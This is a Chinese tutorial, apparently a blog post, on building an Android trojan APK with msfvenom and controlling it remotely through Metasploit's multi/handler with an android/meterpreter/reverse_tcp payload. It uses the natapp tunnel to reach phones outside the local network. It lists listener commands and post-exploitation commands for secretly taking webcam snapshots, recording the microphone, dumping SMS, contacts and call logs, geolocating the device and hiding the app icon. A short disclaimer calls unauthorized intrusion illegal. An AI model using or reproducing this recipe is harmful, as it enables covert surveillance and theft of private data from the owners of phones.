【温馨提示】:

所有有关安全入侵防范知识仅供自己参考学习,未经别人允许入侵别人系统是违法的!



* 准备条件:
natapp Android手机一部 kali操作系统 ip:192.168.43.18
一、实现内网穿透

1.进入https://natapp.cn/ <https://natapp.cn/>,根据提示注册并创建隧道



2.进入https://natapp.cn/#download <https://natapp.cn/#download>下载linux客户端natapp



3.命令行内启动natapp



4.ping server.natappfree.cc得到服务器ip,和端口号:45914



二、Metesploit木马入侵

1.打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件(生成apk木马程序)


*LHOST:本机IP *LPORT:上面的得到的端口 */keivn/test.apk(追加到指定的路径生成test.apk文件)
2.将木马安装到手机上(我直接用自己手机测试学习)
安装完手机上有个MainActivity软件
3.启动msf,msfconsole输入命令:
msf> use exploit/multi/handler //加载模块 msf> set payload
android/meterpreter/reverse_tcp//选择Payload #修改Ip和端口 msf> set LHOST 192.168.43.18
//Ip设置为natapp中配置的本机ip msf> set LPORT 45914 //端口设置为natapp中配置的本地端口 msf> exploit
//开始监听,等待木马相应


5.接下来是一些常用命令
Stdapi: Webcam Commands =================================== webcam_list
列出网络摄像头 record_mic [ˈrekərd]/记录/ 从默认麦克风录制音频为X秒 webcam_chat 开始视频聊天
webcam_snap 从指定的摄像头获取快照 webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头] Android
Commands ================= activity_start 从URI字符串启动Android活动 check_root
检查设备是否有根 dump_calllog 获取调用日志 dump_contacts 获取联系人列表 dump_sms 获取短信 geolocate
利用地理定位获取当前LAT wlan_geolocate 利用WLAN信息获取当前LAT hide_app_icon 从发射器隐藏应用程序图标
interval_collect 管理区间收集能力 send_sms 从目标会话发送短消息 set_audio_mode sqlite_query
从存储库查询SQLite数据库 wakelock 启用/禁用Wakelock

友情链接
ioDraw流程图
API参考文档
OK工具箱
云服务器优惠
阿里云优惠券
腾讯云优惠券
华为云优惠券
站点信息
问题反馈
邮箱:ixiaoyang8@qq.com
QQ群:637538335
关注微信